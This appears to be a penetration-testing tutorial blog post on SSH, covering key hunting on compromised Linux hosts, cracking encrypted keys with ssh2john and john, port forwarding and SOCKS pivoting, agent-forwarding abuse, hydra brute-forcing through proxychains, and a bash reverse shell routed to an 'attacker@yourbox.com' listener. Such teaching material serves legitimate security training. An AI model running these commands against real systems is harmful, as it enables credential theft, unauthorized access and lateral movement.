Mastering SSH: Keys, Tunnels, and Pivoting
SSH (Secure Shell) is a foundational protocol for managing and accessing remote systems. For pentesters, it’s not just about logging in — it’s a powerful tool for pivoting, tunneling, and stealthy movement across networks.
This post covers everything you need to know about SSH during an engagement: finding keys, using them, cracking them, port forwarding, SOCKS proxies, and agent tricks.
What Is SSH?
SSH allows secure remote access to systems using encrypted communication. By default, it runs on port 22, but that can vary. SSH supports:
- Password-based login
- Public/private key authentication
- File transfer (via SCP, SFTP)
- Port forwarding (for tunneling)
Using SSH: The Basics
Login with a password:
ssh user@192.168.1.100
Specify a port:
ssh -p 2222 user@192.168.1.100
Login with a private key:
ssh -i id_rsa user@192.168.1.100
Disable strict host key checking (useful for scripting):
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null user@target
Finding SSH Keys on a Target
If you compromise a Linux system, check for SSH keys:
find /home -name "id_rsa"
Common key locations:
/home/*/.ssh/id_rsa
/home/*/.ssh/authorized_keys
/home/*/.ssh/known_hosts
/root/.ssh/id_rsa
Check for readable private keys with:
find / -name id_rsa 2>/dev/null
Keys can also be found in:
- Git repos (
.git,config,.ssh) - Backup files (
.bak,.tar.gz) - Slack messages, configuration scripts, emails
Cracking Encrypted Private Keys
If the key is password-protected:
ssh2john id_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Once cracked, use the key:
ssh -i id_rsa user@target
Port Forwarding Techniques
SSH lets you forward ports to move through firewalled environments or expose internal services.
1. Local Port Forwarding
Forward a port from your machine to the target’s internal network.
ssh -L 8080:127.0.0.1:80 user@target
- Access
http://localhost:8080on your system - It tunnels to the target and hits
127.0.0.1:80on the target
Use case: Access internal services like web servers, MySQL, etc.
2. Remote Port Forwarding
Expose a service on the target to your system.
ssh -R 2222:localhost:22 user@target
- From the target, it opens port 2222 and forwards to your localhost:22
- You can now SSH back into your box from the target
Use case: Reverse access out of restricted networks
3. Dynamic Port Forwarding (SOCKS Proxy)
Turn SSH into a SOCKS proxy tunnel for pivoting.
ssh -D 1080 user@target
Now set up proxychains4.conf:
socks5 127.0.0.1 1080
Use tools like:
proxychains4 nmap -sT -Pn -p22 10.10.10.50
proxychains4 ssh user@10.10.10.50
Use case: Pivot through a compromised machine to access another internal subnet.
SSH Agent Forwarding
When you’re on a box as a user who’s SSH’d in with their agent running, you may be able to jump again without the private key.
Check for agent:
echo $SSH_AUTH_SOCK
Then try hopping to another box:
ssh -A user@10.10.10.10
Use case: Pivot further when a user has SSH access with agent forwarding enabled.
SSH Tunneling for Pentesters: Real Scenarios
➤ Tunnel a MySQL port (port 3306) to your localhost:
ssh -L 3306:127.0.0.1:3306 user@target
Then:
mysql -h 127.0.0.1 -P 3306 -u root -p
➤ Tunnel RDP over SSH:
ssh -L 3389:10.0.0.5:3389 user@linuxpivot
Then RDP to 127.0.0.1:3389 on your Kali machine.
➤ SOCKS proxy to pivot and brute-force:
ssh -D 9050 user@target
proxychains4 hydra -l admin -P rockyou.txt ssh://10.10.10.12
➤ Remote port forward for a reverse shell listener:
On target:
ssh -R 4444:localhost:4444 attacker@yourbox.com
Now set up listener on your box:
nc -lvnp 4444
If the target runs a shell with bash -i >& /dev/tcp/127.0.0.1/4444 0>&1, it’ll route back through the tunnel.
Bypassing Restrictions
Disable host key checking:
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null ...
SSH without TTY:
Some restricted shells don’t allocate a TTY. Use:
ssh -T user@target
Summary Cheat Sheet
| Task | Command Example |
|---|---|
| SSH with password | ssh user@host |
| SSH with private key | ssh -i id_rsa user@host |
| Local port forward | ssh -L 8080:127.0.0.1:80 user@host |
| Remote port forward | ssh -R 2222:localhost:22 user@host |
| Dynamic SOCKS proxy | ssh -D 1080 user@host |
| Use ProxyChains | proxychains4 ssh user@internal |
| Check for SSH agent | echo $SSH_AUTH_SOCK |
| Cracking private keys | ssh2john id_rsa > hash.txt && john hash.txt |
| Find keys on system | find / -name id_rsa |
Final Thoughts
SSH is more than a way to log in — it’s a stealthy Swiss Army knife. Whether you’re tunneling ports, hopping networks, or exfiltrating data, understanding SSH at this level gives you a serious edge as a pentester.